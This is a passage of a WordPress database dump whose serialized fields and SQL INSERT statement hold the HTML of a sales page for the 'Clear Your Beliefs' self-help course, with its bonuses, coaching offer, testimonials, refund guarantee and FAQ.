love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1612, 2046, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to 